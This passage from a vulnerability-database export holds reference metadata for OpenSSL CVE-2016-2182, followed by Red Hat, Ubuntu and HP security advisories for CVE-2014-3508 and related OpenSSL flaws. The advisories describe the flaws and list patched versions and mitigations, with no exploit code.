Bulletin - October 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=6839c4d3fd328571c675c335d58b5591" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - July 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=2f446a7e1ea263c0c3a365776c6713f2" }, { "title": "Forcepoint Security Advisories: CVE-2016-2180 to -2183, -6302 to -6309, -2179, -7052 OpenSSL Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=forcepoint_security_advisories\u0026qid=a9dd8a175d084c7432b7ad47715ac50c" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - April 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=a31bff03e9909229fd67996884614fdf" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - January 2018", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=e2a7f287e9acc8c64ab3df71130bc64d" }, { "title": "Oracle VM Server for x86 Bulletins: Oracle VM Server for x86 Bulletin - October 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_vm_server_for_x86_bulletins\u0026qid=21c0efa2643d707e2f50a501209eb75c" }, { "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - October 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=13f3551b67d913fba90df4b2c0dae0bf" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - April 2018", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=4019ca77f50c7a34e4d97833e6f3321e" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - April 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=143b3fb255063c81571469eaa3cf0a87" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - October 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=523d3f220a64ff01dd95e064bd37566a" }, { "title": "CVE Scanning of Alpine base images using Multi Stage builds in Docker 17.05\nSummary", "trust": 0.1, "url": "https://github.com/tomwillfixit/alpine-cvecheck " }, { "title": "hackerone-publicy-disclosed", "trust": 0.1, "url": "https://github.com/imhunterand/hackerone-publicy-disclosed " }, { "title": "OpenSSL-CVE-lib", "trust": 0.1, "url": "https://github.com/chnzzh/openssl-cve-lib " } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-2182" }, { "db": "JVNDB", "id": "JVNDB-2016-004780" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-787", "trust": 1.0 }, { "problemtype": "CWE-Other", "trust": 0.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-004780" }, { "db": "NVD", "id": "CVE-2016-2182" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.4, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995039" }, { "trust": 1.4, "url": "https://source.android.com/security/bulletin/2017-03-01.html" }, { "trust": 1.4, "url": "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html" }, { "trust": 1.3, "url": "http://www.ubuntu.com/usn/usn-3087-1" }, { "trust": 1.2, "url": "http://www.securityfocus.com/bid/92557" }, { "trust": 1.2, "url": "http://rhn.redhat.com/errata/rhsa-2016-1940.html" }, { "trust": 1.2, "url": "http://www.ubuntu.com/usn/usn-3087-2" }, { "trust": 1.2, "url": "https://access.redhat.com/errata/rhsa-2018:2185" }, { "trust": 1.2, "url": "https://access.redhat.com/errata/rhsa-2018:2186" }, { "trust": 1.2, "url": "https://access.redhat.com/errata/rhsa-2018:2187" }, { "trust": 1.1, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05302448" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/topics/security/ovmbulletinoct2016-3090547.html" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2016-3090545.html" }, { "trust": 1.1, "url": "http://www.splunk.com/view/sp-caaapue" }, { "trust": 1.1, "url": "http://www.splunk.com/view/sp-caaapsv" }, { "trust": 1.1, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10171" }, { "trust": 1.1, "url": "https://kb.pulsesecure.net/articles/pulse_security_advisories/sa40312" }, { "trust": 1.1, "url": "https://bto.bluecoat.com/security-advisory/sa132" }, { "trust": 1.1, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10759" }, { "trust": 1.1, "url": "https://www.tenable.com/security/tns-2016-16" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1037968" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1036688" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html" }, { "trust": 1.1, "url": "https://www.tenable.com/security/tns-2016-21" }, { "trust": 1.1, "url": "https://www.tenable.com/security/tns-2016-20" }, { "trust": 1.1, "url": "https://security.freebsd.org/advisories/freebsd-sa-16:26.openssl.asc" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2017-10/msg00011.html" }, { "trust": 1.1, "url": "http://seclists.org/fulldisclosure/2017/jul/31" }, { "trust": 1.1, "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-c05302448" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-09/msg00022.html" }, { "trust": 1.1, "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-412672.pdf" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-09/msg00031.html" }, { "trust": 1.1, "url": "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20170322-01-openssl-en" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00011.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-09/msg00023.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2018-02/msg00032.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00012.html" }, { "trust": 1.1, "url": "https://www.arista.com/en/support/advisories-notices/security-advisories/1749-security-advisory-24" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00029.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2017-10/msg00010.html" }, { "trust": 1.1, "url": "https://support.hpe.com/hpsc/doc/public/display?doclocale=en\u0026docid=emr_na-hpesbhf03856en_us" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-09/msg00024.html" }, { "trust": 1.1, "url": "http://www.debian.org/security/2016/dsa-3673" }, { "trust": 1.1, "url": "https://source.android.com/security/bulletin/2017-03-01" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00005.html" }, { "trust": 1.1, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10215" }, { "trust": 1.1, "url": "https://support.f5.com/csp/article/k01276005" }, { "trust": 1.1, "url": "https://support.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-hpesbhf03856en_us" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html" }, { "trust": 1.1, "url": "https://git.openssl.org/?p=openssl.git%3ba=commit%3bh=07bed46f332fce8c1d157689a2cdf915a982ae34" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2182" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu98667810/index.html" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-2182" }, { "trust": 0.8, "url": "http://www.bizmobile.co.jp/news_02.php?id=4069\u0026nc=1" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2182" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6302" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6306" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2178" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2179" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2177" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2181" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6304" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2180" }, { "trust": 0.4, "url": "https://access.redhat.com/security/cve/cve-2016-6306" }, { "trust": 0.4, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.4, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.4, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.4, "url": "https://access.redhat.com/security/cve/cve-2016-2182" }, { "trust": 0.4, "url": "https://access.redhat.com/security/cve/cve-2016-6302" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6303" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2183" }, { "trust": 0.3, "url": "http://openssl.org/" }, { "trust": 0.3, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1367340" }, { "trust": 0.3, "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20160927-openssl" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/openssl_advisory21.asc" }, { "trust": 0.3, "url": "https://www.ibm.com/blogs/psirt/ibm-security-bulletin-multiple-vulnerabilities-in-openssl-affect-ibm-worklight-and-ibm-mobilefirst-platform-foundation-2/" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024394" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=isg3t1024401" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024507" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024648" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1021643" }, { "trust": 0.3, "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html" }, { "trust": 0.3, "url": "http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html" }, { "trust": 0.3, "url": "https://kc.mcafee.com/resources/sites/mcafee/content/live/product_documentation/27000/pd27128/en_us/meg_7_6_406_3402_103_release_notes_en_us.pdf" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21991724" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21992348" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21992898" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21993061" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21993875" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995392" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995393" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995691" }, { "trust": 0.3, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.3, "url": "https://access.redhat.com/security/team/key/" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-3731" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-7055" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-3738" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2017-3731" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2017-3737" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-3732" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2017-3738" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2017-3732" }, { "trust": 0.3, "url": "https://access.redhat.com/documentation/en-us/red_hat_jboss_core_services/2.4.29/" }, { "trust": 0.3, "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2016-7055" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-3737" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2017-3736" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-3736" }, { "trust": 0.2, "url": "https://www.openssl.org/news/secadv/20160922.txt" }, { "trust": 0.2, "url": "https://issues.jboss.org/):" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/787.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=48600" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/3087-1/" }, { "trust": 0.1, "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-349-21" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#important" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2180" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2177" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2181" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-6304" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2179" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2178" }, { "trust": 0.1, "url": "https://www.openssl.org/blog/blog/2016/06/27/undefined-pointer-arithmetic/" }, { "trust": 0.1, "url": "https://www.debian.org/security/faq" }, { "trust": 0.1, "url": "https://www.debian.org/security/" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1-4ubuntu5.37" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1f-1ubuntu2.20" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.2g-1ubuntu4.4" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1f-1ubuntu2.21" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1-4ubuntu5.38" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.2g-1ubuntu4.5" }, { "trust": 0.1, "url": "https://launchpad.net/bugs/1626883" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6308" }, { "trust": 0.1, "url": "https://www.openssl.org/policies/secpolicy.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6305" }, { "trust": 0.1, "url": "https://sweet32.info)" }, { "trust": 0.1, "url": "https://www.openssl.org/policies/releasestrat.html)," }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6307" } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-2182" }, { "db": "BID", "id": "92557" }, { "db": "JVNDB", "id": "JVNDB-2016-004780" }, { "db": "PACKETSTORM", "id": "138870" }, { "db": "PACKETSTORM", "id": "148521" }, { "db": "PACKETSTORM", "id": "148525" }, { "db": "PACKETSTORM", "id": "138817" }, { "db": "PACKETSTORM", "id": "138820" }, { "db": "PACKETSTORM", "id": "138826" }, { "db": "PACKETSTORM", "id": "148524" }, { "db": "PACKETSTORM", "id": "169633" }, { "db": "NVD", "id": "CVE-2016-2182" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULMON", "id": "CVE-2016-2182" }, { "db": "BID", "id": "92557" }, { "db": "JVNDB", "id": "JVNDB-2016-004780" }, { "db": "PACKETSTORM", "id": "138870" }, { "db": "PACKETSTORM", "id": "148521" }, { "db": "PACKETSTORM", "id": "148525" }, { "db": "PACKETSTORM", "id": "138817" }, { "db": "PACKETSTORM", "id": "138820" }, { "db": "PACKETSTORM", "id": "138826" }, { "db": "PACKETSTORM", "id": "148524" }, { "db": "PACKETSTORM", "id": "169633" }, { "db": "NVD", "id": "CVE-2016-2182" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-09-16T00:00:00", "db": "VULMON", "id": "CVE-2016-2182" }, { "date": "2016-08-16T00:00:00", "db": "BID", "id": "92557" }, { "date": "2016-09-21T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-004780" }, { "date": "2016-09-27T19:32:00", "db": "PACKETSTORM", "id": "138870" }, { "date": "2018-07-12T21:45:18", "db": "PACKETSTORM", "id": "148521" }, { "date": "2018-07-12T21:48:57", "db": "PACKETSTORM", "id": "148525" }, { "date": "2016-09-22T22:22:00", "db": "PACKETSTORM", "id": "138817" }, { "date": "2016-09-22T22:25:00", "db": "PACKETSTORM", "id": "138820" }, { "date": "2016-09-23T19:19:00", "db": "PACKETSTORM", "id": "138826" }, { "date": "2018-07-12T21:48:49", "db": "PACKETSTORM", "id": "148524" }, { "date": "2016-09-22T12:12:12", "db": "PACKETSTORM", "id": "169633" }, { "date": "2016-09-16T05:59:02.627000", "db": "NVD", "id": "CVE-2016-2182" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2023-11-07T00:00:00", "db": "VULMON", "id": "CVE-2016-2182" }, { "date": "2018-02-05T15:00:00", "db": "BID", "id": "92557" }, { "date": "2017-10-03T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-004780" }, { "date": "2023-11-07T02:31:01.797000", "db": "NVD", "id": "CVE-2016-2182" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "138870" }, { "db": "PACKETSTORM", "id": "148525" }, { "db": "PACKETSTORM", "id": "138820" }, { "db": "PACKETSTORM", "id": "138826" }, { "db": "PACKETSTORM", "id": "148524" } ], "trust": 0.5 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenSSL of crypto/bn/bn_print.c of BN_bn2dec Service disruption in functionality (DoS) Vulnerabilities", "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-004780" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Failure to Handle Exceptional Conditions", "sources": [ { "db": "BID", "id": "92557" } ], "trust": 0.3 } }
var-201408-0090
Vulnerability from variot
The OBJ_obj2txt function in crypto/objects/obj_dat.c in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i, when pretty printing is used, does not ensure the presence of '\0' characters, which allows context-dependent attackers to obtain sensitive information from process stack memory by reading output from X509_name_oneline, X509_name_print_ex, and unspecified other functions. OpenSSL is prone to an information disclosure vulnerability. An attacker can exploit this issue to gain access to sensitive information that may aid in further attacks. The following versions are vulnerable: OpenSSL 0.9.8 versions prior to 0.9.8zb. OpenSSL 1.0.0 versions prior to 1.0.0n. OpenSSL 1.0.1 versions prior to 1.0.1i. The HP Matrix Operating Environment v7.2.3 Update kit applicable to HP Matrix Operating Environment 7.2.x installations is available at the following location:
https://h20392.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber =HPID
NOTE: Please read the readme.txt file before proceeding with the installation.
References:
CVE-2014-3505 - Remote Denial of Service (DoS) CVE-2014-3506 - Remote Denial of Service (DoS) CVE-2014-3507 - Remote Denial of Service (DoS) CVE-2014-3508 - Remote Disclosure of Information CVE-2014-3510 - Remote Denial of Service (DoS)
SSRT101686
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Moderate: Red Hat JBoss Enterprise Application Platform 6.3 openssl security update Advisory ID: RHSA-2014:1297-01 Product: Red Hat JBoss Enterprise Application Platform Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1297.html Issue date: 2014-09-24 CVE Names: CVE-2014-3505 CVE-2014-3506 CVE-2014-3508 CVE-2014-3510 =====================================================================
- Summary:
An update for the OpenSSL packages for Red Hat JBoss Enterprise Application Platform 6.3 that fixes multiple security issues is now available from the Red Hat Customer Portal.
Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. Description:
Red Hat JBoss Enterprise Application Platform 6 is a platform for Java applications based on JBoss Application Server 7.
OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL), Transport Layer Security (TLS), and Datagram Transport Layer Security (DTLS) protocols, as well as a full-strength, general purpose cryptography library.
It was discovered that the OBJ_obj2txt() function could fail to properly NUL-terminate its output. This could possibly cause an application using OpenSSL functions to format fields of X.509 certificates to disclose portions of its memory. (CVE-2014-3505, CVE-2014-3506)
A NULL pointer dereference flaw was found in the way OpenSSL performed a handshake when using the anonymous Diffie-Hellman (DH) key exchange. (CVE-2014-3510)
All users of Red Hat JBoss Enterprise Application Platform 6.3.0 as provided from the Red Hat Customer Portal are advised to apply this update. The JBoss server process must be restarted for the update to take effect. Solution:
The References section of this erratum contains a download link (you must log in to download the update). Before applying this update, back up your existing Red Hat JBoss Enterprise Application Platform installation and deployed applications. Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2014 Red Hat, Inc. ============================================================================ Ubuntu Security Notice USN-2308-1 August 07, 2014
openssl vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
- Ubuntu 10.04 LTS
Summary:
Several security issues were fixed in OpenSSL.
Software Description: - openssl: Secure Socket Layer (SSL) cryptographic library and tools
Details:
Adam Langley and Wan-Teh Chang discovered that OpenSSL incorrectly handled certain DTLS packets. A remote attacker could use this issue to cause OpenSSL to crash, resulting in a denial of service. (CVE-2014-3505)
Adam Langley discovered that OpenSSL incorrectly handled memory when processing DTLS handshake messages. A remote attacker could use this issue to cause OpenSSL to consume memory, resulting in a denial of service. (CVE-2014-3506)
Adam Langley discovered that OpenSSL incorrectly handled memory when processing DTLS fragments. A remote attacker could use this issue to cause OpenSSL to leak memory, resulting in a denial of service. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-3507)
Ivan Fratric discovered that OpenSSL incorrectly leaked information in the pretty printing functions. (CVE-2014-3508)
Gabor Tyukasz discovered that OpenSSL contained a race condition when processing serverhello messages. A malicious server could use this issue to cause clients to crash, resulting in a denial of service. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-3509)
Felix Gr=C3=B6bert discovered that OpenSSL incorrectly handled certain DTLS handshake messages. A malicious server could use this issue to cause clients to crash, resulting in a denial of service. (CVE-2014-3510)
David Benjamin and Adam Langley discovered that OpenSSL incorrectly handled fragmented ClientHello messages. If a remote attacker were able to perform a man-in-the-middle attack, this flaw could be used to force a protocol downgrade to TLS 1.0. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-3511)
Sean Devlin and Watson Ladd discovered that OpenSSL incorrectly handled certain SRP parameters. A remote attacker could use this with applications that use SRP to cause a denial of service, or possibly execute arbitrary code. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-3512)
Joonas Kuorilehto and Riku Hietam=C3=A4ki discovered that OpenSSL incorrectly handled certain Server Hello messages that specify an SRP ciphersuite. A malicious server could use this issue to cause clients to crash, resulting in a denial of service. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-5139)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 14.04 LTS: libssl1.0.0 1.0.1f-1ubuntu2.5
Ubuntu 12.04 LTS: libssl1.0.0 1.0.1-4ubuntu5.17
Ubuntu 10.04 LTS: libssl0.9.8 0.9.8k-7ubuntu8.20
After a standard system update you need to reboot your computer to make all the necessary changes.
References: http://www.ubuntu.com/usn/usn-2308-1 CVE-2014-3505, CVE-2014-3506, CVE-2014-3507, CVE-2014-3508, CVE-2014-3509, CVE-2014-3510, CVE-2014-3511, CVE-2014-3512, CVE-2014-5139
Package Information: https://launchpad.net/ubuntu/+source/openssl/1.0.1f-1ubuntu2.5 https://launchpad.net/ubuntu/+source/openssl/1.0.1-4ubuntu5.17 https://launchpad.net/ubuntu/+source/openssl/0.9.8k-7ubuntu8.20 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04424322
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04424322 Version: 1
HPSBGN03099 rev.1 - HP IceWall SSO Dfw, SSO Agent and MCRP running OpenSSL, Remote Disclosure of Information
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2014-09-01 Last Updated: 2014-09-01
Potential Security Impact: Remote disclosure of information
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY A potential security vulnerability has been identified with HP IceWall SSO Dfw, SSO Agent and MCRP running OpenSSL.
HP IceWall SSO Agent Option v8.0, v8.0 2007 Update Release 2, and v10.0 HP IceWall MCRP v2.1, v3.0 HP IceWall SSO Dfw v8.0, v8.0 R1, v8.0 R2, v8.0 R3, and v10.0
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2014-3508 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP recommends the following software update options to resolve this vulnerability for HP IceWall SSO Dfw, SSO Agent and MCRP.
-
HP IceWall SSO Agent and MCRP
-
OpenSSL patches are available for RHEL: https://access.redhat.com/security/cve/CVE-2014-3508
-
OpenSSL patches are available for HP-UX.
Please refer to HP Security Bulletin HPSBUX03095: https://h20564.www2.h p.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c04404655
-
-
HP IceWall SSO Dfw
Updated OpenSSL is available for the HP IceWall SSO Dfw Bundle: http://www.hp.com/jp/icewall/_patchaccess
HP recommends the following mitigation information to protect against potential risk for the following HP IceWall products.
HP IceWall SSO Dfw and MCRP
If possible, do not use SHOST setting which allows IceWall SSO Dfw or
MCRP to use SSL/TLS for back-end web server connection.
HP IceWall SSO Dfw
If possible, do not use SHOST and set CC_DECODE_FLG to 0 which will
disable certificate decode by HP IceWall SSO Dfw .
Note: The HP IceWall product is only available in Japan.
HISTORY Version:1 (rev.1) - 2 September 2014 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX
Copyright 2014 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
-----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.19 (GNU/Linux)
